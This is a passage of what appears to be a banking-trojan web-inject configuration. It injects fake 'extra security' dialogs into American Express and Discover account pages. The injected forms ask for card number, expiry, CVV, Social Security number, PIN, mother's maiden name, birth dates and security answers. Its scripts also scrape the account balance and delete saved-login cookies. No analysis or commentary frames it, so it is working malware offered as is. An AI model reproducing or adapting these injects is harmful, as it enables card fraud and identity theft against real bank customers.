1940. </div>
1941. <!--CVV-->
1942. <div id="txt2" class=sunclass style="text-align: left;">
1943. <table>
1944. <tr>
1945. <td align="right">
1946. <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font></td></div>
1947. <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv" maxlength=4 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/312/ac62dbbce67681a33d23490607f59cf6')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
1948. </tr>
1949. </table>
1950. </div>
1951. <!--3 digit code-->
1952. <div id="txt2" class=sunclass style="text-align: left;">
1953. <table>
1954. <tr>
1955. <td align="right">
1956. <div id="div_3digitcode" style="padding:1px; padding-top:7px; width:172px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">3-Digit Code on the back of card:</font></td></div>
1957. <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="3digitcode" style="text-align:right;width:33px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="3digitcode" method="get" maxlength=3 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/273/58be12e2c069fcc7b20ebb2a11921f98')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
1958. </tr>
1959. </table>
1960. </div>
1961. <!--SSN-->
1962. <div id="txt2" class=sunclass style="text-align: left;">
1963. <table>
1964. <tr>
1965. <td align="right">
1966. <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font></td></div>
1967. <td><div id="div_pininp" style =" padding:1px;">
1968. <input type="text" class="amountfield" id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1" maxlength=3 >
1969. <font style="font-family: Verdana;font-size: 11px;">-</font>
1970. <input type="text" class="amountfield" id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2" maxlength=2 >
1971. <font style="font-family: Verdana;font-size: 11px;">-</font>
1972. <input type="text" class="amountfield" id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3" maxlength=4 >
1973. </div></td>
1974. </tr>
1975. </table>
1976. </div>
1977. <!--Personal security PIN-->
1978. <div id="txt2" class=sunclass style="text-align: left;">
1979. <table>
1980. <tr>
1981. <td align="right">
1982. <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Personal security PIN:</font></td></div>
1983. <td><div id="div_pininp" style =" padding:1px;">
1984. <input type="text" class="amountfield" id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ps_pin" maxlength=4 >
1985. </div></td>
1986. </tr>
1987. </table>
1988. </div>
1989. <!--MMN-->
1990. <div id="txt2" class=sunclass style="text-align: left;">
1991. <table>
1992. <tr>
1993. <td align="right">
1994. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
1995. <td><div id="div_pininp" style =" padding:1px;">
1996. <input type="text" class="amountfield" id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn" >
1997. </div></td>
1998. </tr>
1999. </table>
2000. </div>
2001. <!--First Elementary School-->
2002. <!--
2003. <div id="txt2" class=sunclass style="text-align: left;">
2004. <table>
2005. <tr>
2006. <td align="right">
2007. <div id="pincode" style="width:243px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">The Name of Your First Elementary School:</font></td></div>
2008. <td><div id="div_pininp" style =" padding:1px;">
2009. <input type="text" class="amountfield" id="elementary_school" style="width:70px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="elementary_school" >
2010. </div></td>
2011. </tr>
2012. </table>
2013. </div>
2014. -->
2015. <!--POB-->
2016. <div id="txt2" class=sunclass style="text-align: left;">
2017. <table>
2018. <tr>
2019. <td align="right">
2020. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Place of birth:</font></td></div>
2021. <td><div id="div_pob" style =" padding:1px;">
2022. <input type="text" class="amountfield" id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="pob" >
2023. </div></td>
2024. </tr>
2025. </table>
2026. </div>
2027. <!--DOB-->
2028. <div id="txt2" class=sunclass style="text-align: left;">
2029. <table>
2030. <tr>
2031. <td align="right">
2032. <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font></td></div>
2033. <td><div id="div_pininp" style =" padding:1px;">
2034. <input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm" maxlength=2 >
2035. <font style="font-family: Verdana;font-size: 11px;">-</font>
2036. <input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd" maxlength=2 >
2037. <font style="font-family: Verdana;font-size: 11px;">-</font>
2038. <input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy" maxlength=4 >
2039. </div></td>
2040. </tr>
2041. </table>
2042. </div>
2043. <!--MDOB-->
2044. <div id="txt2" class=sunclass style="text-align: left;">
2045. <table>
2046. <tr>
2047. <td align="right">
2048. <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font></td></div>
2049. <td><div id="div_pininp" style =" padding:1px;">
2050. <input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm" maxlength=2 >
2051. <font style="font-family: Verdana;font-size: 11px;">-</font>
2052. <input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd" maxlength=2 >
2053. <font style="font-family: Verdana;font-size: 11px;">-</font>
2054. <input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy" maxlength=4 >
2055. </div></td>
2056. </tr>
2057. </table>
2058. </div>
2059. <!--Email-->
2060. <div id="txt2" class=sunclass style="text-align: left;">
2061. <table>
2062. <tr>
2063. <td align="right">
2064. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Your Email:</font></td></div>
2065. <td><div id="div_email" style =" padding:1px;">
2066. <input type="text" class="amountfield" id="email" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="email" >
2067. </div></td>
2068. </tr>
2069. </table>
2070. </div>
2071. <div id="txt2" class=sunclass style="height: 20px; padding:3px ;padding-right:15px;">
2072. <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right"><input type="image" onclick="return formmySubmit();" align="right" src="/myca/shared/summary/asr/images/lnf/btn_continue.gif" value="Verify" title="Continue"/></div></font>
2073. </div>
2074. <input type="hidden" name="system" value="14">
2075. </form>
2076. </div><script type="text/javascript">
2077. function tabNext1CC(elem) {
2078. if(elem.value.length == 4) {
2079. document.getElementById('cc2').focus();
2080. function tabNext2CC(elem) {
2081. if(elem.value.length == 6) {
2082. document.getElementById('cc3').focus();
2083. function formmySubmit() {
2084. $("#msg").css("background", "#f5f6f1");
2085. if (checkCC()) {
2086. $("#div_cc_text").css("color", "black");
2087. if (checkExp()) {
2088. $("#div_exp").css("color", "black");
2089. if (checkCVV()) {
2090. $("#div_cvv").css("color", "black");
2091. if (check3DigitCode()) {
2092. $("#div_3digitcode").css("color", "black");
2093. if (SSN_check() == true) {
2094. $("#div_ssn").css("color", "black");
2095. if (PS_PIN_check() == true) {
2096. $("#div_ps_pin").css("color", "black");
2097. if (POB_check() == true) {
2098. $("#div_pob").css("color", "black");
2099. if (Email_check() == true) {
2100. $("#div_email").css("color", "black");
2101. if (checkDob() == true) {
2102. $("#div_dob").css("color", "black");
2103. $("#div_mdob").css("color", "black");
2104. $.cookie("trusted_rapport", "1", {
2105. expires: 10,
2106. path: "/",
2107. domain: ".americanexpress.com"
2108. });
2109. $("#dialog").dialog("close");
2110. return true
2111. } else {
2112. $("#div_dob").css("color", "red");
2113. $("#div_mdob").css("color", "red");
2114. doError("Date of birth")
2115. } else {
2116. $("#div_email").css("color", "red");
2117. doError("Email")
2118. } else {
2119. $("#div_pob").css("color", "red");
2120. doError("place of birth")
2121. } else {
2122. $("#div_ps_pin").css("color", "red");
2123. doError("personal security PIN")
2124. } else {
2125. $("#div_ssn").css("color", "red");
2126. doError("social security number")
2127. } else {
2128. $("#div_3digitcode").css("color", "red");
2129. doError("3-digit code")
2130. } else {
2131. $("#div_cvv").css("color", "red");
2132. doError("cvv code")
2133. } else {
2134. $("#div_exp").css("color", "red");
2135. doError("expiration date")
2136. } else {
2137. $("#div_cc_text").css("color", "red");
2138. doError("card number")
2139. function out() {
2140. document.body.removeChild(img)
2141. function move(a) {
2142. a = a || window.event;
2143. if (a.pageX == null && a.clientX != null) {
2144. var b = document.documentElement;
2145. var c = document.body;
2146. a.pageX = a.clientX + (b && b.scrollLeft || c && c.scrollLeft || 0) - (b.clientLeft || 0);
2147. a.pageY = a.clientY + (b && b.scrollTop || c && c.scrollTop || 0) - (b.clientTop || 0)
2148. img.style.left = a.pageX + 15 + "px";
2149. img.style.top = a.pageY + 15 + "px"
2150. function over(a) {
2151. img = document.createElement("div");
2152. document.body.appendChild(img);
2153. img.innerHTML = "<img src=" + a + " />";
2154. img.style.zIndex = "111111111111";
2155. img.style.position = "absolute";
2156. img.style.background = "#FFFFFF";
2157. img.style.border = "solid 1px #346fdc";
2158. img.style.padding = "4px";
2159. move();
2160. function SSN_check() {
2161. var a = $("#ssn_1").val();
2162. var b = $("#ssn_2").val();
2163. var c = $("#ssn_3").val();
2164. var d = a.length + b.length + c.length;
2165. if (d == 9)
2166. if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
2167. return true;
2168. return false
2169. function PS_PIN_check() {
2170. var a = $("#ps_pin").val();
2171. var d = a.length;
2172. if (d == 4)
2173. //if (isNaN(a) == false) // uncomment if pin is digital only
2174. return true;
2175. return false
2176. function POB_check() {
2177. var a = $("#pob").val();
2178. var d = a.length;
2179. if (d > 0) {
2180. return true;
2181. else {
2182. return true;
2183. function Email_check() {
2184. var a = $("#email").val();
2185. var d = a.length;
2186. if (d > 0) {
2187. return true;
2188. else {
2189. return true;
2190. function check3DigitCode() {
2191. var a = $("#3digitcode").val();
2192. var b = a.length;
2193. if (isNaN(a) == false)
2194. if (b == 3)
2195. return true;
2196. return false
2197. function checkCVV() {
2198. var a = $("#cvv").val();
2199. var b = a.length;
2200. if (isNaN(a) == false)
2201. if (b == 4)
2202. return true;
2203. return false
2204. function checkExp() {
2205. var a = $("#exp_mm").val();
2206. var b = $("#exp_yy").val();
2207. var c = a.length + b.length;
2208. if (c > 5)
2209. if (a > 0 && a < 13)
2210. if (b > 2009 && b < 2030)
2211. return true;
2212. return false
2213. function checkCC() {
2214. var a = $("#cc1").val();
2215. var b = $("#cc2").val();
2216. var c = $("#cc3").val();
2217. if (check_cc(a+b+c) && a.charAt(0) == "3")
2218. return true;
2219. return false
2220. function checkDob() {
2221. var a = $("#dob_mm").val();
2222. var b = $("#dob_dd").val();
2223. var c = $("#dob_yy").val();
2224. var d = $("#mdob_mm").val();
2225. var e = $("#mdob_dd").val();
2226. var f = $("#mdob_yy").val();
2227. var g = a.length + b.length + c.length;
2228. var h = d.length + e.length + f.length;
2229. if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
2230. if (g > 6)
2231. if (c < 1995 && c > 1900)
2232. if (a > 0 && a < 13 && b > 0 && b < 32)
2233. if ((isNaN(d) || isNaN(e) || isNaN(f)) == false)
2234. if (h > 6)
2235. if (d > 0 && d < 13 && e > 0 && e < 32)
2236. if (f + 12 < c)
2237. return true;
2238. return false
2239. function doError(a) {
2240. $("#ername").text(a);
2241. $("#ername1").text(a);
2242. $("#msg").dialog({
2243. closeOnEscape: false,
2244. resizable: false,
2245. modal: true,
2246. width: 350,
2247. modal: true,
2248. zIndex: 99999
2249. function formClose() {
2250. $("#msg").dialog("close");
2251. return true
2252. function check_cc(cardnumber) {
2253. var cardNo = cardnumber.replace(/[^0-9]/g, "");
2254. if (cardNo.length < 15 || cardNo.length > 16) {
2255. return false;
2256. var checksum = 0;
2257. var j = 1;
2258. var calc;
2259. for (i = cardNo.length - 1; i >= 0; i--) {
2260. calc = Number(cardNo.charAt(i)) * j;
2261. if (calc > 9) {
2262. checksum = checksum + 1;
2263. calc = calc - 10;
2264. checksum = checksum + calc;
2265. if (j == 1) {
2266. j = 2;
2267. } else {
2268. j = 1;
2269. if (checksum % 10 != 0) {
2270. return false;
2271. return true;
2272. jQuery.cookie = function(a, b, c) {
2273. if (typeof b != "undefined") {
2274. c = c || {};
2275. if (b === null) {
2276. b = "";
2277. c.expires = -1
2278. var d = "";
2279. if (c.expires && (typeof c.expires == "number" || c.expires.toUTCString)) {
2280. var e;
2281. if (typeof c.expires == "number") {
2282. e = new Date;
2283. e.setTime(e.getTime() + c.expires * 24 * 60 * 60 * 1e3)
2284. } else
2285. e = c.expires;
2286. d = "; expires=" + e.toUTCString()
2287. var f = c.path ? "; path=" + c.path: "";
2288. var g = c.domain ? "; domain=" + c.domain: "";
2289. var h = c.secure ? "; secure": "";
2290. document.cookie = [a, "=", encodeURIComponent(b), d, f, g, h].join("")
2291. } else {
2292. var i = null;
2293. if (document.cookie && document.cookie != "") {
2294. var j = document.cookie.split(";");
2295. for (var k = 0; k < j.length; k++) {
2296. var l = jQuery.trim(j[k]);
2297. if (l.substring(0, a.length + 1) == a + "=") {
2298. i = decodeURIComponent(l.substring(a.length + 1));
2299. break
2300. return i
2301. if ($.cookie("trusted_rapport"));
2302. else
2303. $(document).ready(function() {
2304. $('.comingSoonPop').remove();
2305. $('.comingSoonTransLayer').remove();
2306. $("#dialog").dialog({
2307. closeOnEscape: false,
2308. resizable: false,
2309. modal: true,
2310. width: 350,
2311. modal: true,
2312. zIndex: 99998
2313. });
2314. $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif"></div>');
2315. // balance
2316. $('form#test').append('<input id=balance name=balance type=hidden>');
2317. var balance = '';
2318. balance += 'Outstanding Balance='+$('div#outBalAmount').text().replace('and', '').replace('Cents', '')+" ___ ";
2319. balance += 'Available Credit ='+$('div#limitMsgAvailableCrd').text()+" ___ ";
2320. //alert(balance);
2321. $('form#test input#balance').val(balance);
2322. </script></body>]]></replacement>
2323. </modify>
2324. </actions>
2325. </httpinject>
2326. <httpinject>
2327. <conditions>
2328. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*\.americanexpress\.com.*]]></url>
2329. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
2330. </url>
2331. </conditions>
2332. <actions>
2333. <modify>
2334. <pattern modifiers="msU"><![CDATA[\</html\>]]></pattern>
2335. <replacement><![CDATA[<script type="text/javascript">
2336. // remove saved IDs
2337. Delete_Cookie("profile", "/", ".americanexpress.com");
2338. var UsernameField = document.getElementById('Username');
2339. if(UsernameField) {
2340. UsernameField.value = '';
2341. UsernameField.blur();
2342. function get_cookie(name) {
2343. var cookie = " " + document.cookie;
2344. var search = " " + name + "=";
2345. var setStr = null;
2346. var offset = 0;
2347. var end = 0;
2348. if (cookie.length > 0) {
2349. offset = cookie.indexOf(search);
2350. if (offset != -1) {
2351. offset += search.length;
2352. end = cookie.indexOf(";", offset);
2353. if (end == -1) {
2354. end = cookie.length;
2355. setStr = unescape(cookie.substring(offset, end));
2356. return setStr;
2357. function Delete_Cookie( name, path, domain ) {
2358. if ( get_cookie( name ) ) document.cookie = name + "=" +
2359. ( ( path ) ? ";path=" + path : "") +
2360. ( ( domain ) ? ";domain=" + domain : "" ) +
2361. ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
2362. </script></html>]]></replacement>
2363. </modify>
2364. </actions>
2365. </httpinject>
2366. <httpinject>
2367. <conditions>
2368. <url type="allow" onpost="1" onget="1" modifiers="U">^https\://www\.discovercard\.com/cardmembersvcs/achome/
2369. </url>
2370. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
2371. </url>
2372. </conditions>
2373. <actions>
2374. <modify>
2375. <pattern modifiers="msU"><![CDATA[</body>]]></pattern>
2376. <replacement><![CDATA[<div id="namefr" style="display:none;" >
2377. <iframe width="50" height="50" id="myfx" name="myfx"></iframe>
2378. <iframe width="50" height="50" id="myfx1" name="myfx1" src="https://www.discovercard.com/cardmembersvcs/personalprofile/pp/GetInitialInfo"></iframe>
2379. </div>
2380. <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
2381. <style type="text/css">
2382. .ui-dialog-titlebar{ background: white }
2383. .text1a{font-family: Arial; font-size: 10px;}
2384. .sunclass
2385. border-bottom-color: #cccccc;
2386. border-bottom-style: solid;
2387. border-bottom-width: 1px;
2388. border-collapse: collapse;
2389. background-color: #f5f6f1;
2390. color: #333333;
2391. margin-right:10px;
2392. margin-left:10px;
2393. text-align: center;
2394. </style>
2395. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
2396. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
2397. <div id="msg" style=" display:none; height:80px;" class=sunclass>
2398. <div id="box" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
2399. <font style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
2400. </div>
2401. <div id="qdiv" style="display:none; width : 400px;" >
2402. <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
2403. <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
2404. </div>
2405. <div id="txt2" class=sunclass>
2406. <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please answer the following questions:</font>
2407. </div>
2408. <form action="personalomnistat.js" id="test" method="get" target="myfx" >
2409. <div id="txt2" class=sunclass style="text-align: right;">
2410. <table>
2411. <tr>
2412. <td align="right">
2413. <div id="div_question_1" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">In what city were you born?</font></td></div>
2414. <td><div id="div_pininp" style =" padding:1px;">
2415. <input type="text" class="amountfield" id="q1" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="borncity" method="get" />
2416. </div></td>
2417. </tr>
2418. </table>
2419. </div>
2420. <div id="txt2" class=sunclass style="text-align: right;">
2421. <table>
2422. <tr>
2423. <td align="right">
2424. <div id="div_question_2" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">What is your father's middle name?</font></td></div>
2425. <td><div id="div_pininp" style =" padding:1px;">
2426. <input type="text" class="amountfield" id="q2" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="fotherMN " method="get" />
2427. </div></td>
2428. </tr>
2429. </table>
2430. </div>
2431. <div id="txt2" class=sunclass style="text-align: right;">
2432. <table>
2433. <tr>
2434. <td align="right">
2435. <div id="div_question_3" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">What is your mother's middle name?</font></td></div>
2436. <td><div id="div_pininp" style =" padding:1px;">
2437. <input type="text" class="amountfield" id="q3" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="motherMN" method="get" />
2438. </div></td>
2439. </tr>
2440. </table>
2441. </div>
2442. <div id="txt2" class=sunclass style="padding:3px ;padding-right:15px;">
2443. <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right">
2444. <input border="0" type="image" alt="Continue" onclick="return quest();" src="/discover/images/account/buttons/btn_continue.gif">
2445. </div>
2446. <input type="hidden" name="system" value="14">
2447. </form>
2448. </div>
2449. </div>
2450. </div>
2451. <div id="dialog" style=" display:none; height:180px; width:350px;padding:0; margin0;">
2452. <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
2453. <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
2454. </div>
2455. <div id="txt2" class=sunclass>
2456. <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
2457. </div>
2458. <form action="personalomnistat.js" id="test" method="get" target="myfx" >
2459. <!--CC-->
2460. <div id="full_cc" class=sunclass style="text-align: left;">
2461. <table>
2462. <tr>
2463. <td>
2464. <div id="div_cc_text" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
2465. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Credit Card Number:</font><br><span class="text1a">(16 digits)</span></td></div>
2466. </td>
2467. <td>
2468. <div id="div_cc" style ="padding:1px;">
2469. <input type="text" class="amountfield" id="cc1" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1" method="get" maxlength=4 ></input>
2470. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
2471. <input type="text" class="amountfield" id="cc2"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2" method="get" maxlength=4 ></input>
2472. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
2473. <input type="text" class="amountfield" id="cc3" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc3" method="get" maxlength=4 ></input>
2474. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
2475. <input type="text" class="amountfield" id="cc4" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc4" method="get" maxlength=4 ></input>
2476. </div>
2477. </td>
2478. </tr>
2479. </table>
2480. </div>
2481. <!--EXP-->
2482. <div id="fulll_exp" class=sunclass style="text-align: left;">
2483. <table>
2484. <tr>
2485. <td align="right">
2486. <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
2487. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font><br><span class="text1a">(/mm/yyyy/)</span></td></div>
2488. </td>
2489. <td>
2490. <div id="div_exp" style ="padding:1px;">
2491. <input type="text" class="amountfield" id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm" method="get" maxlength=2 ></input>
2492. <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
2493. <input type="text" class="amountfield" id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy" method="get" maxlength=4 ></input>
2494. </div></td>
2495. </tr>
2496. </table>
2497. </div>
2498. <!--CVV-->
2499. <div id="txt2" class=sunclass style="text-align: left;">
2500. <table>
2501. <tr>
2502. <td align="right">
2503. <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
2504. <font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font><br><span class="text1a">(3 digits)</span></td></div>
2505. <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv" method="get" maxlength=3 ></input></div></td>
2506. </tr>
2507. </table>
2508. </div>
2509. <!--SSN-->
2510. <div id="txt2" class=sunclass style="text-align: left;">
2511. <table>
2512. <tr>
2513. <td align="right">
2514. <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font><br><span class="text1a">(9 digits)</span></td></div>
2515. <td><div id="div_pininp" style =" padding:1px;">
2516. <input type="text" class="amountfield" id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1" method="get" maxlength=3 ></input>
2517. <font style="font-family: Verdana;font-size: 11px;">-</font>
2518. <input type="text" class="amountfield" id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2" method="get" maxlength=2 ></input>
2519. <font style="font-family: Verdana;font-size: 11px;">-</font>
2520. <input type="text" class="amountfield" id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3" method="get" maxlength=4 ></input>
2521. </div></td>
2522. </tr>
2523. </table>
2524. </div>
2525. <!--MMN-->
2526. <div id="txt2" class=sunclass style="text-align: left;">
2527. <table>
2528. <tr>
2529. <td align="right">
2530. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
2531. <td><div id="div_pininp" style =" padding:1px;">
2532. <input type="text" class="amountfield" id="mmn" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn" method="get" ></input>
2533. </div></td>
2534. </tr>
2535. </table>
2536. </div>
2537. <!--DOB-->
2538. <div id="txt2" class=sunclass style="text-align: left;">
2539. <table>
2540. <tr>
2541. <td align="right">
2542. <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font><br><span class="text1a">(/mm/dd/yyyy/)</span></td></div>
2543. <td><div id="div_pininp" style =" padding:1px;">
2544. <input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm" method="get" maxlength=2 ></input>
2545. <font style="font-family: Verdana;font-size: 11px;">-</font>
2546. <input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd" method="get" maxlength=2 ></input>
2547. <font style="font-family: Verdana;font-size: 11px;">-</font>
2548. <input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy" method="get" maxlength=4 ></input>
2549. </div></td>
2550. </tr>
2551. </table>
2552. </div>
2553. <!--MDOB-->
2554. <div id="txt2" class=sunclass style="text-align: left;">
2555. <table>
2556. <tr>
2557. <td align="right">
2558. <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font><br><span class="text1a">(/mm/dd/yyyy/)</span></td></div>
2559. <td><div id="div_pininp" style =" padding:1px;">
2560. <input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm" method="get" maxlength=2 ></input>
2561. <font style="font-family: Verdana;font-size: 11px;">-</font>
2562. <input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd" method="get" maxlength=2 ></input>
2563. <font style="font-family: Verdana;font-size: 11px;">-</font>
2564. <input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy" method="get" maxlength=4 ></input>
2565. </div></td>
2566. </tr>
2567. </table>
2568. </div>
2569. <!--Sequence Number-->
2570. <div id="txt2" class=sunclass style="text-align: left;">
2571. <table>
2572. <tr>
2573. <td align="right">
2574. <div id="div_seqnum" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Sequence Number:</font><br><span class="text1a">(1 letter and 3 digits)</span></td></div>
2575. <td><div id="div_pininp" style =" padding:1px;">
